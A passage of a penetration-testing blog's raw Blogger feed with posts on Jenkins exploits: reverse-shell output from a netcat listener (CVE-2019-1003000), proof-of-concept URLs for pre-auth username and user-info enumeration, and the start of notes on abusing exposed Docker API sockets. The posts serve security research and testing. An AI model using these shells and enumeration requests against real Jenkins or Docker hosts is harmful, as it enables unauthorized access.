queue...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] waiting for job to build...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] restoring job...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] fetching output...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] OUTPUT:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EStarted by user User 1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003ERunning in Durability level: MAX_SURVIVABILITY\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Eand you get:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Enc -l 4444 -vv\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash: cannot set terminal process group (7): Not a tty\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash: no job control in this shell\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash-4.4$\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash-4.4$\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash-4.4$ whoami\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ewhoami\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ejenkins\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003C\/span\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash-4.4$\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003EThe TLDR is you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and\u0026nbsp;\u003C\/span\u003Eif you have\u0026nbsp;Overall\/Read permission and Job\/Configure permission\u0026nbsp;\u003Cspan style=\"font-family: inherit;\"\u003Ewhich a regular Jenkins user is more inclined to have and\u0026nbsp; this exploit doesn't require using the script console.\u003C\/span\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8614793690517339202\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=8614793690517339202","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8614793690517339202"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8614793690517339202"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-messing-with-exploits-pt2-cve.html","title":"Jenkins - messing with exploits pt2 - CVE-2019-1003000"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-OasO2i-fRPQ\/XHbpJ6aXnfI\/AAAAAAAACak\/husg5qpMErEfMXpRx9HYdrNr7V327nTSACLcBGAs\/s72-c\/Screen%2BShot%2B2019-02-27%2Bat%2B2.45.35%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-3913946841422367356"},"published":{"$t":"2019-02-26T13:46:00.001-05:00"},"updated":{"$t":"2019-02-28T10:43:04.167-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - messing with new exploits pt1"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins notes for:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Ehttps:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Ehttp:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Eto download old jenkins WAR files\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"http:\/\/updates.jenkins-ci.org\/download\/war\/\" target=\"_blank\"\u003Ehttp:\/\/updates.jenkins-ci.org\/download\/war\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E1st bug in the blog is a username enumeration bug in\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cul style=\"background-color: white; box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;\"\u003E\n\u003Cli style=\"box-sizing: border-box;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins weekly up to and including 2.145\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli style=\"box-sizing: border-box;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EJenkins LTS up to and including 2.138.1\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"color: #212529; font-family: \u0026quot;lato\u0026quot; , \u0026quot;roboto\u0026quot; , \u0026quot;open sans\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; font-size: 14px;\"\u003EFrom the blog:\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;\"\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EPre-auth User Information Leakage\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EWhile testing Jenkins, it’s a common scenario that you want to perform a brute-force attack but you don’t know which account you can try(a valid credential can read the source at least so it’s worth to be the first attempt).\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"background-color: white;\"\u003EIn this situation, this vulnerability is useful!\u003C\/span\u003E\u003Cspan style=\"background-color: white;\"\u003EDue to the lack of permission check on search functionality. By modifying the\u0026nbsp;\u003C\/span\u003E\u003Ccode style=\"background-color: rgba(0, 0, 0, 0.04); border-radius: 4px; box-sizing: border-box; padding: 2px 4px;\"\u003Ekeyword\u003C\/code\u003E\u003Cspan style=\"background-color: white;\"\u003E\u0026nbsp;from a to z, an attacker can list all users on Jenkins!\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003C\/div\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; font-size: 1.25em; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EPoC:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cpre style=\"background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;\"\u003E\u003Ccode style=\"background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Ehttp:\/\/jenkins.local\/securityRealm\/user\/admin\/search\/index?q=[keyword]\u003C\/span\u003E\u003C\/code\u003E\u003C\/pre\u003E\n\u003C\/div\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-c9BXVmqGaPQ\/XHRIr3N118I\/AAAAAAAACaM\/MBMvRSHsyM0i8WGIkftNCvLRBPWTcyF4wCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-25%2Bat%2B2.55.42%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"798\" data-original-width=\"1600\" height=\"318\" src=\"https:\/\/1.bp.blogspot.com\/-c9BXVmqGaPQ\/XHRIr3N118I\/AAAAAAAACaM\/MBMvRSHsyM0i8WGIkftNCvLRBPWTcyF4wCLcBGAs\/s640\/Screen%2BShot%2B2019-02-25%2Bat%2B2.55.42%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\/securityRealm\/user\/admin\/search\/index?q=a\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-IPQ8L3wv2w0\/XHRIr3kg5aI\/AAAAAAAACaI\/YpAOL02lI_UN6BhzAQCP4jkC6h21OuqBgCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-25%2Bat%2B2.57.06%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"496\" data-original-width=\"1292\" height=\"244\" src=\"https:\/\/1.bp.blogspot.com\/-IPQ8L3wv2w0\/XHRIr3kg5aI\/AAAAAAAACaI\/YpAOL02lI_UN6BhzAQCP4jkC6h21OuqBgCLcBGAs\/s640\/Screen%2BShot%2B2019-02-25%2Bat%2B2.57.06%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\/securityRealm\/user\/admin\/search\/index?q=c\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv style=\"text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: left;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; \"\u003E\u003Cb\u003EALERT\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; \"\u003EEven though the advisory says 2.138_1 i tested against 2.138 and the exploit doesn't work.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003ESOOOOO you are looking for Jenkins \u0026lt;= 2.137\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EIf jenkins is really old the above should work and also\u003C\/span\u003E\u0026nbsp;\u003Ca href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-1000395\" style=\"font-family: times, \u0026quot;times new roman\u0026quot;, serif;\" target=\"_blank\"\u003Ehttps:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-1000395\u003C\/a\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u0026nbsp;where you can get the email address via similar query.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Eversions up to (including) 2.73.1\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Eversions up to (including) 2.83\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; font-size: 1.25em;\"\u003EPoC:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cpre style=\"background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;\"\u003E\u003Ccode style=\"background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Ehttp:\/\/jenkins.local\/securityRealm\/user\/admin\/api\/xml\u003C\/span\u003E\u003C\/code\u003E\u003C\/pre\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003Ewith 2.137 you can get username\/id\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-FgiB-uaV0m4\/XHRKR1d89CI\/AAAAAAAACaY\/0qgC0uey2OgC5EvdDfpsHzeZ67kqDOo1QCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-25%2Bat%2B3.00.13%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"385\" data-original-width=\"1600\" height=\"152\" src=\"https:\/\/1.bp.blogspot.com\/-FgiB-uaV0m4\/XHRKR1d89CI\/AAAAAAAACaY\/0qgC0uey2OgC5EvdDfpsHzeZ67kqDOo1QCLcBGAs\/s640\/Screen%2BShot%2B2019-02-25%2Bat%2B3.00.13%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\/securityRealm\/user\/cg\/api\/xml\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/3913946841422367356\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=3913946841422367356","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/3913946841422367356"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/3913946841422367356"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-messing-with-new-exploits-pt1.html","title":"Jenkins - messing with new exploits pt1"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-c9BXVmqGaPQ\/XHRIr3N118I\/AAAAAAAACaM\/MBMvRSHsyM0i8WGIkftNCvLRBPWTcyF4wCLcBGAs\/s72-c\/Screen%2BShot%2B2019-02-25%2Bat%2B2.55.42%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8436225123281631092"},"published":{"$t":"2019-02-01T08:32:00.002-05:00"},"updated":{"$t":"2019-02-01T08:43:04.312-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"docker"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Abusing Docker API | Socket"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003ENotes on abusing open Docker sockets\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis wont cover breaking out of docker containers\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPorts: usually 2375 \u0026amp; 2376 but can be anything\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003ERefs:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/blog.sourcerer.io\/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.sourcerer.io\/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.slideshare.net\/BorgHan\/hacking-docker-the-easy-way\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.slideshare.net\/BorgHan\/hacking-docker-the-easy-way\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.secureideas.com\/2018\/05\/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.secureideas.com\/2018\/05\/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.secureideas.com\/2018\/08\/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.secureideas.com\/2018\/08\/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/infoslack.com\/devops\/exploring-docker-remote-api\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/infoslack.com\/devops\/exploring-docker-remote-api\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2016\/03\/06\/The-Dangers-Of-Docker.sock\/\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/raesene.github.io\/blog\/2016\/03\/06\/The-Dangers-Of-Docker.sock\/\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/cert.litnet.lt\/2016\/11\/owning-system-through-an-exposed-docker-engine\/\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/cert.litnet.lt\/2016\/11\/owning-system-through-an-exposed-docker-engine\/\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca 